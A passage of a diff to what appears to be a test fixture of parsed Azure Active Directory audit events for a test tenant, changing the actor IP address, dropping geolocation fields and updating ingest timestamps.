"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -11983,25 +10957,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -12015,7 +10971,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -12151,7 +11107,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -12163,12 +11119,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036420700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125175700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -12194,25 +11150,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -12226,7 +11164,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -12362,7 +11300,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -12374,12 +11312,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036425100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 